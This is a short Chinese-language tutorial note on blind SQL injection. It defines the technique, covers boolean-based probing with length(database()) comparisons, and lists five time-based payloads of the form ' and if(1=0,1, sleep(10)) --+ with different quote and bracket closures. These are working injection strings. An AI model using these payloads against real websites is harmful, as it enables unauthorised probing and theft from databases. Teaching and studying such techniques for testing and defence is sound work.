SQL注入之盲注
什么是盲注?
没有回显的SQL注入称为盲注。
盲注的类型
1.基于布尔的盲注
基于布尔的盲注:
常使用
select length(database()) = N等
2.基于时间的盲注
基于时间的盲注,常用的判断语句:
' and if(1=0,1, sleep(10)) --+
" and if(1=0,1, sleep(10)) --+
) and if(1=0,1, sleep(10)) --+
') and if(1=0,1, sleep(10)) --+
") and if(1=0,1, sleep(10)) --+
if(condition, true, false)这个函数当condition为真是返回的是true的语句结果,为假时返回false的语句结果